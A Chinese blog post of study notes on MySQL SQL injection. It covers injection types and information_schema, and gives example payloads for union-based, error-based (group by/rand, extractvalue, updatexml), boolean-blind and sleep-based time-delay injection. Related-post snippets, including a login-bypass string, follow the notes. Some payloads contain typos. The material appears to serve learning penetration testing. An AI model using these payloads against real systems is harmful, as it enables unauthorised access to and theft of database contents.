SQL注入-1

已于 2022-03-21 09:36:05 修改
阅读量3.8k 收藏
点赞数
分类专栏: 渗透测试漏洞学习 文章标签: 安全性测试
于 2022-03-19 21:24:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36567469/article/details/123585019
版权

SQL注入-1

本次sql注入以mysql为例,整理的千锋网络视频的内容

1. 关系型数据库

有明显的层次结构库名|表名|字段名|字段内容
MySQL\ACCESS\mssql\oracle

2. SQL注入类别

  • 联合查询注入
  • 报错注入
  • 布尔盲注
  • 延时注入
  • 多语句查询注入

3. MySQL

3.1元数据数据库
  • information_schema
    • tables
      • table_name\tabel_schema
    • columns
      • column_name/table_name/schema_name
3.2 常用函数与参数
version()//mysql版本
database()
user()
current_user()
system_user()//系统用户名
@@datadir//数据库路径
@@version_compile_os//操作系统版本
length()
substring()
concat()
caoncat_ws()//有分隔符
group_concat()
rand()
sleep()
3.3 SQL注入点判断
3.3.1联合查询

联合查询:利用union select语句,会同时执行两条select语句,生成两张虚拟表。
联合查询必要条件

  1. 两张虚拟表有相同列数。
  2. 虚拟表对应列数的数据类型相同。

A union select B时,一般页面只显示A的内容,B的内容不显示,这时可在A后加入and 1=2等语句,将A的内容设为false,这种情况下就会在页面中显示B的内容。

联合查询时可用到hex(table_name)这个函数,为了避免引号影响,将文本转换为十六进制(数字格式);也可用到group_concat(table_name)这个函数,

3.3.2报错注入

group by注入
利用group by重复建冲突建报错

? id=33 union select 1,2,concat(left(rand(),3)'>',@@version,'>')as a,4,5,6 from information_schema.tables group by a--+

如果information_schema.tables等关键表被禁用,可用以下语句构造一个表

select 1 union select null union select !1

select concat(left(rand(),3),'>',select version(),'>')as x ,count(*) from (select 1 union select null union select !1)as x group by a--+

如果rand()和count()被禁用,可以用以下方式

select min(@a:=1) from (select 1 union select null union select !1)a group by concat('>',@@version,'>',@a=(@a+1)%2);

** SQL语句解析过程**

  1. from:from标识了这条语句要查的数据源,形成虚拟表VT1。
  2. where:对VT1过程中生成的临时表进行过滤,把满足where字句的列插到VT2
  3. group by:把VT2生成的表按照group by 中的列进行分组,形成VT3。
  4. having:对VT3进行过滤,满足条件的数据被加到VT4
  5. select:对select子句中的元素进行处理,形成VT5表(先计算表达式,再distinct之类)

** XPath报错注入**

  1. extracvalue():对xml文档进行查询的函数,语法为“extractvalue(目标xml文档,xml路径)”,正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错。
id?=33 and extracvalue(1,concat('>',(select version()),'<')--+`

注:extractvalue()能查询字符串的最大长度为32,如果想要的结果超过32,就需要用substring()函数截取,一次查看32位。
2. updatexml():更新xml文档的函数,语法为“updatexml(目标xml文档,xml路径,更新的内容)”,正常查询第二个参数的格式也应该是/xxx/xx/xx/xx,其他格式就会报错

?id=33 and updatexml(1,concat('>',select version(),'<'),1)--+
3.3.3布尔盲注
id=1 and ascii(substr(database(),1,1))>0
3.3.4延时注入

利用sleep()语句

?id=3 and if(length(database())=3,sleep(5),1)--+

MySQL注入基础及语句

姜姜--
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入-xiabee1
08-03
1.1 安装靶场 1.2 手工注入 1.2.1 联合查询注入 1.2.2 报错注入 1.3 源码审计
sql注入之select/union select
@一只躺平的猪@的博客
07-14 2984
select :select 1 from table、 select count(1) from table、select sum(1) from table union select:union语句使用条件、判断字段数 union select 1,2(或union select null,null)、 判断回显位置
为什么sql注入的时候会写union select 1,2~~~~~from admin
被遗弃的庸才博客
04-15 1万+
我也是最近好奇才去学了一点web渗透的知识。在这之前还是需要一定的数据库的相关知识。这里假设知道当前表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...
变态方法突破过滤UNION+SELECT继续注入
ncafei的博客
11-27 1万+
http://www.jb51.net/article/48933.htm   前几今天遇到一个bt 的老外注射点:     //*ps 此点目前流行的注射工具射不 *//     http:// /index.php?content=more_product&id=17     http:// /index.php?content=more_product&i
sql注入中的union select 1,2,3....
热门推荐
good good study
03-15 2万+
sql注入联合查询中,我们会碰到union select 1,2,3。那这个是什么意思了,首先先看下union select union select 用来合并两个或多个 SELECT 语句的结果集。比如这里新建了两个表,users和users2 users表如下 users2如下 联合查询,即查询users表中的name字段的值和查询users2表中的address字段的值,将结果一起返回 注意:union select只能查询两个表中共同都有的字段,如果一个字...
关于如select 1 from **中的"1"。
辛いいか
12-20 2557
     在这里我主要讨论的有以下几个select 语句:table表是一个数据表,假设表的行数为10行,以下同。1:select  1 from table      2:select count(1)  from table  3:select sum(1) from table对第一个select语句,我刚开始以为是“1”代表是列名,从2,3种顺推得出得结果:)有点无耻吧。不过通过我自己得观
10-sql注入-mysql注入1
08-03
1. **SQL注入原理**: 当应用程序将用户提供的数据直接拼接到SQL查询中而不进行适当验证时,就可能发生SQL注入。攻击者可以通过构造特定的输入,使SQL查询执行非预期的操作,如读取、修改或删除敏感数据,甚至获取...
09-sql注入-mssql1
08-03
SQL注入是一种常见的安全漏洞,攻击者通过输入恶意SQL语句来获取未授权的数据或执行恶意操作。针对SQL Server,攻击者可能使用的注入技术包括: 1. 判断是否存在注入漏洞。 2. 确定数据库类型。 3. 猜测表名和字段。...
简单的sql注入问题
12-30
sql注入问题:sql的特殊关键字与字符串拼接。会造成安全性的问题 1输入名随便,输入密码:a’ or ‘a’=’a sql:select* from user where username=‘123’ and password=‘a’ or ‘a’=‘a’ ** // 1.获取链接 ...
SQL注入-概述-ppt.pptx
10-27
SQL相关资料
SQL注入
jgmgtdp的博客
07-27 105
SQL注入 ?id= 35 +1/-1 select * from tbName where id=$id ?id= 35’ 字符型 或者是数字型 select * from tbName where id=35’ 报错信息有35就是字符型,没有35就是数字型 测试页面是否有布尔类型的状态 ?id=35 and 1=1 ?id=35 and 1=2 ?id=35 and sleep(5) 是否延迟 联合查询 union select语句 两条sel
SQL注入学习
qq_41007744的博客
05-01 695
字符串连接函数1. concat(str1,str2,...)连接参数产生的字符串。select concat(id,',',name) as con from info limit 1;2. group_concat(str1,str2,...)连接一个组所有的字符串,以逗号分割。3. concat_ws(separator,str1,str2,...)&lt;br&gt;含有分割符的连接字符串...
Postman中的API安全堡垒:全面安全性测试指南
2402_85758349的博客
07-10 651
API安全性测试旨在评估API的安全性,确保它们能够抵御恶意攻击和未经授权的访问。
测试类型介绍-安全性测试实战技巧
java电商源码分享
07-11 385
在当今数字化时代,软件安全不再是可选项,而是每一款产品的必备特性。随着网络攻击的复杂性和频率不断上升,成为了确保应用程序健壮性和用户数据保护的关键环节。
100款古风PPT (80).pptx
最新发布
07-13
【ppt素材】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
多旋翼飞行器设计与控制理论 -第15讲_展望V2.pdf
07-13
多旋翼飞行器设计与控制理论 -第15讲_展望V2.pdf
光伏项目设备资产配置方式论证报告.doc
07-13
光伏项目设备资产配置方式论证报告.doc
1720843046670.png
07-13
1720843046670.png
CJ60Lib.dll
07-13
.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
[第一章 web入门]sql注入-1
06-28
SQL注入是一种常见的攻击方式,攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取敏感信息或者执行非法操作。SQL注入攻击的原理是利用Web应用程序没有对用户输入的数据进行充分的过滤和验证,从而导致恶意SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值